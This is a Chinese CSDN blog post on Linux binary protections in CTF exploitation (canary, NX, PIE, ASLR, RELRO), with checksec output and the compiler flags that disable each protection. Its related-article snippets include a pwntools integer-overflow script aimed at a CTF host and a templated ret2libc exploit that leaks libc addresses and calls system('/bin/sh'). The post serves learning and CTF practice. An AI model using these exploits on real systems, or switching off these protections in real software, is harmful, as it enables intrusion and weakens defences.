pwn中常见的保护

最新推荐文章于 2024-12-03 15:35:29 发布
最新推荐文章于 2024-12-03 15:35:29 发布
阅读量650 收藏 10
点赞数 10
分类专栏: pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/biu801/article/details/139568130
版权

checksec 可以查看程序开启了哪些保护。

➜ ~ checksec /bin/ls                                  
[*] '/bin/ls'
  Arch:     amd64-64-little
  RELRO:   Full RELRO
  Stack:   Canary found
  NX:       NX enabled
  PIE:     PIE enabled
  FORTIFY: Enabled

 Canary

canary 是一种防止缓冲区溢出攻击的保护机制。它的基本思想是在程序的堆栈中插入一个随机生成的数值,用于检测缓冲区溢出攻击。

.text:0000000000001189 endbr64
.text:000000000000118D push   rbp
.text:000000000000118E mov     rbp, rsp
.text:0000000000001191 sub     rsp, 30h
.text:0000000000001195 mov     rax, fs:28h
.text:000000000000119E mov     [rbp-8], rax
...
.text:00000000000011CE mov     rdx, [rbp-8]
.text:00000000000011D2 xor     rdx, fs:28h
.text:00000000000011DB jz     short locret_11E2
.text:00000000000011DB
.text:00000000000011DD call   ___stack_chk_fail
.text:00000000000011DD
.text:00000000000011E2 ; --------------------------------------------------------
-------------------
.text:00000000000011E2
.text:00000000000011E2 locret_11E2:                           ; CODE XREF:
f+52↑j
.text:00000000000011E2 leave
.text:00000000000011E3 retn

canary 的初始值存储在 tls 中,也就是前面提到的 stack_guard 。
在编译 c 程序时使用 -fno-stack-protector 参数可以关闭 canary 保护(注意高版本的 gcc 的 canary保护关不掉)。

NX

NX 即 No-execute(不可执行),NX 的基本原理是将数据所在内存页标识为不可执行,也就是同一内存可写与可执行不共存。 

gcc 编译器默认开启了 NX 选项,如果需要关闭 NX 选项,可以给 gcc 编译器添加 -zexecstack 参数

PIE

PIE 主要随机了代码段( .text ),初始化数据段( .data )和未初始化数据段( .bss )的地址。另
外 PIE 是否开启还会影响堆的基址。
开启 PIE:
关闭 PIE:
在编译 c 程序时使用 -no-pie 参数可以关闭 PIE 保护。

ASLR

ASLR 是系统级别的地址随机。通过修改 /proc/sys/kernel/randomize_va_space 的值可以控制
ASLR 的级别:
0:关闭 ASLR
1:栈基址,共享库,mmap 基址随机
2:在 1 的基础上增加堆基址的随机
 
关闭 PIE
关闭 ASLR: 主模块加载地址固定(0x400000)所有模块加载地址固定
开启 ASLR:主模块加载地址固定(0x400000) 其他模块加载地址不固定
开启 PIE
关闭 ASLR:所有模块加载地址固定 主模块地址(主模块基址 0x55xxxxxxxxxx且固定)
开启 ASLR:所有模块加载地址不固定

RELRO

当 RELRO 保护为 NO RELRO 的时候, init.array 、 fini.array 、 got.plt 均可读可写。
为 PARTIAL RELRO 的时候, init.array 、 fini.array 根据实际调试结果判断是否可写,
got.plt 可读可写。
为 FULL RELRO 时, init.array 、 fini.array 、 got.plt 均可读不可写。
-Wl,-z,norelro 编译参数可以关闭 RELRO ,使 RELRO 状态变为 NO RELRO 。
-Wl,-z,lazy 会开启延迟绑定,使 RELRO 状态变为 Partial RELRO 。

1.pwn基础总结
admin的博客
10-03 1万+
Int_overflow # Int_overflow context(log_level='debug', os='Linux', arch='amd64') p = remote("pwn.blackbird.wang", 9501) payload = "2147483648" p.sendlineafter("Input an int ( <0 )\n", payload) p.interactive() ret2text from pwn import * conte.
pwn(基础的栈溢出-上)
2302_80935968的博客
05-16 1287
编译器使用堆栈传递函数参数、保存返回地址、临时保存寄存器原有值(即函数调用的上下文)以备恢复以及存储本地局部变量栈的特点:后进先出的数据结构,栈的结构是从进程高地址向进程低地址生长这里说一下寄存器:寄存器是处理器加工数据或运行程序的重要载体,用于存放程序执行中用到的数据和指令。因此函数调用栈的实现与处理器寄存器组密切相关。最初的8086中寄存器是16位,每个都有特殊用途,寄存器名城反映其不同用途。由于IA32平台采用平面寻址模式,对特殊寄存器的需求大大降低,但由于历史原因,这些寄存器名称被保留下来。
PWN保护机制以及编译方法
逆向萌新的博客
11-07 2924
PWN保护机制以及编译方法
PWN--保护机制
2401_82918917的博客
11-25 216
Linux ELF文件的保护机制主要分为四种:Canary、NX、PIE、RELRO。
pwn学习---保护机制
gclome的博客
03-20 2689
操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险,包括DEP、ASLR等。在编写漏洞利用代码的时候,需要特别注意目标进程是否开启了DEP(Linux下对应NX)、ASLR(Linux下对应PIE)等机制,例如存在DEP(NX)的话就不能直接执行栈上的数据,存在ASLR(PIE)的话各个系统调用的地址就是随机化的。 解读: Arch: i386-32-little ...
pwn四种基本保护
空舟的博客
12-03 815
前言 学习pwn,了解到的四种basic protection 1.Stack Guard • 做完function prologue①的时候回将随机生成的乱数压入stack中,function return前会检查乱数是否又被更动过,若发现被更动则立即结束程式 • 又称canary 金丝雀② 注释: ①function prologue:移动 RSP 和保存寄存器的动作一般处在函数的开头,叫做 function prologue ②canary:看视频讲的有一个了解,在煤矿中有毒或易燃气体的存在,常引起井
6.pwn Linux保护机制
2301_80361487的博客
07-07 478
CANARYNXASLRPIERELRO回顾栈的作用为存储函数调用相关信息以及函数的局部变量这些局部变量通常为数组或者输入的缓冲区(buf)。而函数调用相关的信息,主要是返回地址和栈底指针(rbp)
PWN的简单了解
cyy001128的博客
12-01 1135
Pwn 是一个骇客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:"You just got pwned!")。在骇客行话里,尤其在另外一种电脑技术方面,包括电脑(服务器或个人电脑)、网站、闸道装置、或是应用程序,"pwn"在这一方面的意思是攻破("to compromise",危及、损害)或是控制("to control")。
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 3958
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
pwn入门题目汇总.rar
09-01
缓冲区溢出pwn中最常见的漏洞类型,它发生在程序试图向固定大小的缓冲区内写入超出其容量的数据时。这可能导致数据覆盖相邻内存区域,如返回地址,从而允许攻击者控制程序执行流程。学习如何利用这种漏洞通常包括...
PWN-Challenges
03-17
在IT领域,尤其是网络安全竞赛(Capture The Flag,简称CTF)中,“PWN”是一种常见的挑战类型,它涉及利用程序漏洞来控制或“攻陷”系统。PWN挑战通常包括了缓冲区溢出、格式字符串漏洞、整数溢出、栈溢出、堆溢出...
PWN不欢沙龙演讲PPT.rar
05-20
10. **安全编程**:学习PWN的目的是为了更好地防止攻击,了解常见的编程陷阱和如何避免它们是每个开发者的必修课。 通过这个"无PWN不欢沙龙演讲PPT",观众可能学到了如何识别、利用和防范各种类型的漏洞,同时也会...
【二进制安全】PWN基础入门大全(非常详细)零基础入门到精通,收藏这一篇就够了
热门推荐
leah126的博客
07-25 1万+
PWN是一个黑客之间使用的词语,通常指攻破设备或系统。发音类似“砰”,对黑客而言,这象征着成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被操纵了。在网络安全语境中,PWN通常指的是通过不同的攻击手段如利用漏洞、进行社会工程学攻击等方法成功地获得了一个设备、系统或网络的未授权控制权。一旦攻击者“PWN了”一个系统,他们就可以执行各种恶意活动,如窃取数据、安装恶意软件或制造更广泛的破坏。
《CTF特训营》——PWN:二进制安全基础
PICACHU+++的博客
08-13 3163
即DEP,是进制程序在非可执行的内存区中执行指令。在80x86体系中,操作系统的内存管理是通过页面表存储方式来实现,其最后一位就是NX位,0表示允许执行,1表示禁止执行。NX一般是防止直接在堆和栈上运行shellcode代码,gcc默认开启不可执行栈功能,添加编译选项z -exestack可开启栈可执行功能。...
PWN——rip1——没有保护的栈溢出
2301_80905479的博客
12-03 592
gets函数的缓冲区是由用户本身提供,由于用户无法指定一次最多可读入多少字节,导致此函数存在巨大安全隐患。换句话来说,就是gets若没有遇到 \n 结束,则会无限读取,没有上限。那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。因此再回来看fun()函数,就是一个系统调用,故payload=‘a’ * 15 + p64(0x401186)我们从源代码看到有个危险函数gets,这个函数对边界没有检查,可以造成栈溢出。用F5查看函数,看看是什么函数。
Jarvis OJ-PWN-[XMAN]level2 wp
分不清东西南北的Laffey
09-30 602
地址:nc pwn2.jarvisoj.com 9878 把下载好的文件放到虚拟机中 用checksec看一下保护 【1】RELRO:RELRO会有Partial RELRO和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 【2】Stack:如果栈中开启Canary found,那么就不能用直接用溢出的方法覆盖栈中返回地址,而且要通过改写指针与局部变量、lea...
PWN】03.Linux-User Mode-栈溢出-x86-基本ROP
weixin_52553215的博客
11-23 4043
检查保护:checksec 文件名 编译并关闭栈保护:gcc -no-pie -fno-stack-protector -z execstack -m32 -o read read.c 查看程序使用了哪些函数:objdump -t -j .test.read(推荐使用ida)
PWN入门(2)利用缓冲区溢出绕过登录和第一个PwnTools脚本
Ba1_Ma0的博客
09-08 1565
有什么不会或者是错误的地方的可以私信我,看到必回。
PWN学习---1、基本漏洞-缓冲区溢出
weixin_42766694的博客
04-19 521
环境:Ubuntu12.04 32位 一、存在漏洞代码 //vuln.c #include <stdio.h> #include <string.h> int main(int argc,char * argv []) { /* [1] */ char buf [256]; /* [2] */ strcpy(buf,argv [1]); /* [3] */ printf("input:%s \n",buf);
pie保护 pwn 例题
最新发布
01-06
### 关于PIE保护机制下的PWN攻击实例 在存在位置无关可执行文件(Position Independent Executable, PIE)的情况下,程序加载地址会在每次运行时被随机化。这增加了利用漏洞的难度,因为传统的返回导向编程(ROP)依赖固定的基址来计算目标函数或gadget的位置。 然而,在某些情况下仍然可以实施有效的攻击策略。例如,在未完全启用RELRO的部分程序中可能存在动态链接表(Global Offset Table, GOT)条目重写的机会[^1]。对于这类情形,可以通过泄露库函数的实际地址并结合偏移量找到系统调用或其他有用功能的确切位置。 当面对开启了PIE但其他安全措施较弱的目标时,一种常见的方法是通过信息泄漏获取当前映像基址,之后再构建针对特定版本二进制文件已知布局的payload来进行控制转移。下面给出一个基于`ret2plt`技巧的具体案例分析: #### 实战演练:CTF挑战题目的解析 考虑一道名为“ezpie”的题目来自NISACTF 2022竞赛[^2]。此题提供了一个易受攻击的服务端应用,它虽然启用了PIE特性却未能充分设置栈溢出防护机制。这意味着如果能够绕过ASLR的影响,则有可能实现远程代码执行。 为了完成这一任务,选手们通常会采取如下手段之一: - 利用格式字符串错误读取内存中的关键数据片段; - 或者借助UAF (Use After Free) 缺陷间接访问已经释放的对象结构体成员变量; 无论哪种方式获得的信息都可以帮助定位libc.so及其他重要模块的真实起始点,从而为进一步规划rop chain奠定基础。 ```python from pwn import * # 建立连接至服务 conn = remote('target_ip', port) # 发送恶意输入触发缓冲区溢出条件... conn.sendlineafter(b'prompt:', payload) # 接收响应包内含潜在有价值的指针值 leaked_ptr = u64(conn.recvuntil(b'\n').strip().ljust(8,b'\x00')) log.info(f"Leaked pointer @ {hex(leaked_ptr)}") base_addr = leaked_ptr - known_offset_from_libc_base_to_leak_point system_plt = base_addr + offset_of_system_in_libc bin_sh_str = base_addr + offset_of_binsh_string_in_libc final_payload = b'A'*offset_until_retaddr \ + p64(system_plt) \ + p64(ret_gadget_if_needed) \ + p64(bin_sh_str) conn.sendline(final_payload) conn.interactive() ``` 上述脚本展示了如何与远端服务器交互,并尝试构造合适的载荷以期达成命令注入的目的。当然实际操作过程中还需要根据具体情况调整细节部分如偏移量等参数设定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值